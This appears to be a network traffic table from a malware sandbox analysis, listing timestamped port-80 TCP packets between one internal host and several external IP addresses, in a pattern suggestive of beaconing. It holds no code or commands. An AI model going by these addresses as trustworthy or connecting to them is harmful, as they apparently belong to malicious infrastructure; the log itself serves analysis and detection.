May 3, 2024 11:33:28.004228115 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:28.036524057 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:28.036564112 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:28.036626101 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:29.330169916 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.344552994 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.437797070 CEST	80	49177	66.96.162.142	192.168.2.22
May 3, 2024 11:33:30.437901020 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.438066959 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.530921936 CEST	80	49177	66.96.162.142	192.168.2.22
May 3, 2024 11:33:30.548059940 CEST	80	49177	66.96.162.142	192.168.2.22
May 3, 2024 11:33:30.548119068 CEST	80	49177	66.96.162.142	192.168.2.22
May 3, 2024 11:33:30.548207045 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.548311949 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.858908892 CEST	49177	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:30.951636076 CEST	80	49177	66.96.162.142	192.168.2.22
May 3, 2024 11:33:35.765105963 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:35.938354015 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:35.938421011 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:35.938687086 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:36.112078905 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:36.112097025 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:36.112123966 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:36.285171986 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:36.288728952 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:36.288978100 CEST	80	49178	192.185.225.30	192.168.2.22
May 3, 2024 11:33:36.289024115 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:36.571577072 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:33:36.697896957 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:33:36.697958946 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:33:37.458198071 CEST	49178	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:38.456423998 CEST	49179	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:38.630012989 CEST	80	49179	192.185.225.30	192.168.2.22
May 3, 2024 11:33:38.630079985 CEST	49179	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:38.630331039 CEST	49179	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:38.804594040 CEST	80	49179	192.185.225.30	192.168.2.22
May 3, 2024 11:33:38.815211058 CEST	80	49179	192.185.225.30	192.168.2.22
May 3, 2024 11:33:38.815258980 CEST	80	49179	192.185.225.30	192.168.2.22
May 3, 2024 11:33:38.815332890 CEST	49179	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:40.140994072 CEST	49179	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:41.156073093 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:41.329535961 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.332125902 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:41.336074114 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:41.509480000 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.509497881 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.509609938 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:41.682825089 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.685367107 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.685399055 CEST	80	49180	192.185.225.30	192.168.2.22
May 3, 2024 11:33:41.685550928 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:42.839917898 CEST	49180	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:43.854024887 CEST	49181	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:44.027879000 CEST	80	49181	192.185.225.30	192.168.2.22
May 3, 2024 11:33:44.027944088 CEST	49181	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:44.028136969 CEST	49181	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:44.202372074 CEST	80	49181	192.185.225.30	192.168.2.22
May 3, 2024 11:33:44.218744040 CEST	80	49181	192.185.225.30	192.168.2.22
May 3, 2024 11:33:44.218914986 CEST	80	49181	192.185.225.30	192.168.2.22
May 3, 2024 11:33:44.218975067 CEST	49181	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:44.219002962 CEST	49181	80	192.168.2.22	192.185.225.30
May 3, 2024 11:33:44.392524004 CEST	80	49181	192.185.225.30	192.168.2.22
May 3, 2024 11:33:49.374645948 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:49.534629107 CEST	80	49182	203.161.62.199	192.168.2.22
May 3, 2024 11:33:49.534688950 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:49.534950972 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:50.047007084 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:50.204941988 CEST	80	49182	203.161.62.199	192.168.2.22
May 3, 2024 11:33:50.205008984 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:50.363626957 CEST	80	49182	203.161.62.199	192.168.2.22
May 3, 2024 11:33:50.375938892 CEST	80	49182	203.161.62.199	192.168.2.22
May 3, 2024 11:33:50.375997066 CEST	80	49182	203.161.62.199	192.168.2.22
May 3, 2024 11:33:50.376122952 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:51.045428038 CEST	49182	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:52.792433023 CEST	49183	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:52.950886965 CEST	80	49183	203.161.62.199	192.168.2.22
May 3, 2024 11:33:52.950956106 CEST	49183	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:52.951159954 CEST	49183	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:53.109666109 CEST	80	49183	203.161.62.199	192.168.2.22
May 3, 2024 11:33:53.119637012 CEST	80	49183	203.161.62.199	192.168.2.22
May 3, 2024 11:33:53.119707108 CEST	80	49183	203.161.62.199	192.168.2.22
May 3, 2024 11:33:53.119787931 CEST	49183	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:54.600694895 CEST	49183	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:55.600898981 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:55.758387089 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:55.758508921 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:55.758833885 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:55.915877104 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:55.915894032 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:55.915931940 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:56.073205948 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:56.084638119 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:56.084654093 CEST	80	49184	203.161.62.199	192.168.2.22
May 3, 2024 11:33:56.084707975 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:57.269936085 CEST	49184	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.284200907 CEST	49185	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.443578959 CEST	80	49185	203.161.62.199	192.168.2.22
May 3, 2024 11:33:58.443650961 CEST	49185	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.457670927 CEST	49185	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.616070986 CEST	80	49185	203.161.62.199	192.168.2.22
May 3, 2024 11:33:58.627691031 CEST	80	49185	203.161.62.199	192.168.2.22
May 3, 2024 11:33:58.627758980 CEST	80	49185	203.161.62.199	192.168.2.22
May 3, 2024 11:33:58.627845049 CEST	49185	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.627974033 CEST	49185	80	192.168.2.22	203.161.62.199
May 3, 2024 11:33:58.786341906 CEST	80	49185	203.161.62.199	192.168.2.22
May 3, 2024 11:34:04.433985949 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:04.610577106 CEST	80	49186	217.26.48.101	192.168.2.22
May 3, 2024 11:34:04.610675097 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:04.611815929 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:04.788146973 CEST	80	49186	217.26.48.101	192.168.2.22
May 3, 2024 11:34:04.788197994 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:04.964194059 CEST	80	49186	217.26.48.101	192.168.2.22
May 3, 2024 11:34:04.964329004 CEST	80	49186	217.26.48.101	192.168.2.22
May 3, 2024 11:34:04.964378119 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:06.115159988 CEST	49186	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:07.129415989 CEST	49187	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:07.305115938 CEST	80	49187	217.26.48.101	192.168.2.22
May 3, 2024 11:34:07.305186987 CEST	49187	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:07.305361032 CEST	49187	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:07.481216908 CEST	80	49187	217.26.48.101	192.168.2.22
May 3, 2024 11:34:07.481235981 CEST	80	49187	217.26.48.101	192.168.2.22
May 3, 2024 11:34:07.481281042 CEST	49187	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:08.813996077 CEST	49187	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:12.022387028 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:12.198009968 CEST	80	49188	217.26.48.101	192.168.2.22
May 3, 2024 11:34:12.198067904 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:12.198388100 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:12.373992920 CEST	80	49188	217.26.48.101	192.168.2.22
May 3, 2024 11:34:12.374063015 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:12.549778938 CEST	80	49188	217.26.48.101	192.168.2.22
May 3, 2024 11:34:12.549895048 CEST	80	49188	217.26.48.101	192.168.2.22
May 3, 2024 11:34:12.549973965 CEST	80	49188	217.26.48.101	192.168.2.22
May 3, 2024 11:34:12.550018072 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:13.697474957 CEST	49188	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:14.710957050 CEST	49189	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:14.886522055 CEST	80	49189	217.26.48.101	192.168.2.22
May 3, 2024 11:34:14.888250113 CEST	49189	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:14.888434887 CEST	49189	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:15.064352989 CEST	80	49189	217.26.48.101	192.168.2.22
May 3, 2024 11:34:15.064389944 CEST	80	49189	217.26.48.101	192.168.2.22
May 3, 2024 11:34:15.064528942 CEST	49189	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:15.065903902 CEST	49189	80	192.168.2.22	217.26.48.101
May 3, 2024 11:34:15.241414070 CEST	80	49189	217.26.48.101	192.168.2.22
May 3, 2024 11:34:25.907769918 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:26.088695049 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.089097023 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:26.089179039 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:26.269748926 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.269776106 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.269872904 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:26.452375889 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.452478886 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.452649117 CEST	80	49190	46.28.105.2	192.168.2.22
May 3, 2024 11:34:26.456259966 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:27.598731041 CEST	49190	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:28.625087023 CEST	49191	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:28.807934046 CEST	80	49191	46.28.105.2	192.168.2.22
May 3, 2024 11:34:28.808193922 CEST	49191	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:28.808193922 CEST	49191	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:28.990880013 CEST	80	49191	46.28.105.2	192.168.2.22
May 3, 2024 11:34:28.991292000 CEST	80	49191	46.28.105.2	192.168.2.22
May 3, 2024 11:34:28.991349936 CEST	80	49191	46.28.105.2	192.168.2.22
May 3, 2024 11:34:28.991401911 CEST	49191	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:30.310861111 CEST	49191	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:31.324991941 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:31.509891033 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.509953022 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:31.510257959 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:31.691299915 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.691364050 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:31.691935062 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.874836922 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.874850035 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.874905109 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.875046015 CEST	80	49192	46.28.105.2	192.168.2.22
May 3, 2024 11:34:31.875138044 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:33.009607077 CEST	49192	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.023894072 CEST	49193	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.207041025 CEST	80	49193	46.28.105.2	192.168.2.22
May 3, 2024 11:34:34.210463047 CEST	49193	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.210463047 CEST	49193	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.392925978 CEST	80	49193	46.28.105.2	192.168.2.22
May 3, 2024 11:34:34.393316031 CEST	80	49193	46.28.105.2	192.168.2.22
May 3, 2024 11:34:34.393410921 CEST	80	49193	46.28.105.2	192.168.2.22
May 3, 2024 11:34:34.393745899 CEST	49193	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.393745899 CEST	49193	80	192.168.2.22	46.28.105.2
May 3, 2024 11:34:34.576260090 CEST	80	49193	46.28.105.2	192.168.2.22
May 3, 2024 11:34:39.552541971 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:39.725811005 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:39.725887060 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:39.726219893 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:39.899405003 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:39.899420977 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:39.899488926 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:39.899521112 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:39.899559975 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:39.900223970 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:40.072758913 CEST	80	49194	162.240.81.18	192.168.2.22
May 3, 2024 11:34:40.076240063 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:41.230846882 CEST	49194	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:42.245053053 CEST	49195	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:42.419881105 CEST	80	49195	162.240.81.18	192.168.2.22
May 3, 2024 11:34:42.420484066 CEST	49195	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:42.420484066 CEST	49195	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:42.593668938 CEST	80	49195	162.240.81.18	192.168.2.22
May 3, 2024 11:34:42.593981028 CEST	80	49195	162.240.81.18	192.168.2.22
May 3, 2024 11:34:42.594063997 CEST	80	49195	162.240.81.18	192.168.2.22
May 3, 2024 11:34:42.594105005 CEST	80	49195	162.240.81.18	192.168.2.22
May 3, 2024 11:34:42.594309092 CEST	49195	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:43.929661989 CEST	49195	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:44.944231987 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:45.117825985 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.117913961 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:45.118235111 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:45.292548895 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.292602062 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.292635918 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:45.292678118 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.292709112 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.292747974 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:45.466481924 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.466506958 CEST	80	49196	162.240.81.18	192.168.2.22
May 3, 2024 11:34:45.466584921 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:46.628453016 CEST	49196	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:47.745639086 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:47.919116020 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:47.919209957 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:47.919375896 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:48.092648983 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:48.092771053 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:48.092854977 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:48.092900991 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:48.092936993 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:48.093038082 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:48.093148947 CEST	49197	80	192.168.2.22	162.240.81.18
May 3, 2024 11:34:48.266565084 CEST	80	49197	162.240.81.18	192.168.2.22
May 3, 2024 11:34:59.381439924 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:34:59.556782007 CEST	80	49198	91.195.240.94	192.168.2.22
May 3, 2024 11:34:59.556855917 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:34:59.557101011 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:34:59.732624054 CEST	80	49198	91.195.240.94	192.168.2.22
May 3, 2024 11:34:59.732667923 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:34:59.733637094 CEST	80	49198	91.195.240.94	192.168.2.22
May 3, 2024 11:34:59.909133911 CEST	80	49198	91.195.240.94	192.168.2.22
May 3, 2024 11:34:59.909183979 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:01.058527946 CEST	49198	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:04.048122883 CEST	49199	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:04.223823071 CEST	80	49199	91.195.240.94	192.168.2.22
May 3, 2024 11:35:04.226489067 CEST	49199	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:04.226489067 CEST	49199	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:04.406793118 CEST	80	49199	91.195.240.94	192.168.2.22
May 3, 2024 11:35:04.406807899 CEST	80	49199	91.195.240.94	192.168.2.22
May 3, 2024 11:35:04.406915903 CEST	49199	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:05.745685101 CEST	49199	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:06.752707958 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:06.927699089 CEST	80	49200	91.195.240.94	192.168.2.22
May 3, 2024 11:35:06.927813053 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:06.928121090 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:07.103157043 CEST	80	49200	91.195.240.94	192.168.2.22
May 3, 2024 11:35:07.103255033 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:07.105009079 CEST	80	49200	91.195.240.94	192.168.2.22
May 3, 2024 11:35:07.278297901 CEST	80	49200	91.195.240.94	192.168.2.22
May 3, 2024 11:35:07.278328896 CEST	80	49200	91.195.240.94	192.168.2.22
May 3, 2024 11:35:07.278378010 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:08.437357903 CEST	49200	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.451669931 CEST	49201	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.627157927 CEST	80	49201	91.195.240.94	192.168.2.22
May 3, 2024 11:35:09.627501011 CEST	49201	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.627954006 CEST	49201	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.804210901 CEST	80	49201	91.195.240.94	192.168.2.22
May 3, 2024 11:35:09.804251909 CEST	80	49201	91.195.240.94	192.168.2.22
May 3, 2024 11:35:09.804598093 CEST	49201	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.804598093 CEST	49201	80	192.168.2.22	91.195.240.94
May 3, 2024 11:35:09.979918003 CEST	80	49201	91.195.240.94	192.168.2.22
May 3, 2024 11:35:14.947947979 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.134419918 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.134632111 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.138391018 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.326457977 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.326695919 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.326721907 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.513134956 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557394028 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557413101 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557447910 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557485104 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.557507038 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557549000 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557595968 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.557610989 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557665110 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.557694912 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:15.557764053 CEST	80	49202	46.242.239.47	192.168.2.22
May 3, 2024 11:35:15.558600903 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:19.170690060 CEST	49202	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.288094044 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.477596045 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.477653980 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.478938103 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.668292999 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688565969 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688607931 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688642025 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688654900 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.688745975 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688782930 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688857079 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688905001 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.688916922 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.688916922 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:20.688967943 CEST	80	49203	46.242.239.47	192.168.2.22
May 3, 2024 11:35:20.689016104 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:21.978306055 CEST	49203	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:22.992388964 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.193557978 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.193622112 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.194020033 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.395169020 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.395225048 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.395471096 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.596827984 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.596844912 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678255081 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678276062 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678309917 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.678366899 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678406000 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678445101 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:23.678500891 CEST	80	49204	46.242.239.47	192.168.2.22
May 3, 2024 11:35:23.678555012 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:24.694327116 CEST	49204	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:25.706794977 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:25.894191027 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:25.894464970 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:25.894742012 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:26.083791018 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:26.128945112 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:26.128957987 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:26.128968954 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:26.129077911 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:26.129255056 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:26.129255056 CEST	49205	80	192.168.2.22	46.242.239.47
May 3, 2024 11:35:26.317193985 CEST	80	49205	46.242.239.47	192.168.2.22
May 3, 2024 11:35:31.262106895 CEST	49206	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:31.351073027 CEST	80	49206	208.91.197.27	192.168.2.22
May 3, 2024 11:35:31.351136923 CEST	49206	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:31.351697922 CEST	49206	80	192.168.2.22	208.91.197.27
May 3, 2024 11:35:31.438877106 CEST	80	49206	208.91.197.27	192.168.2.22
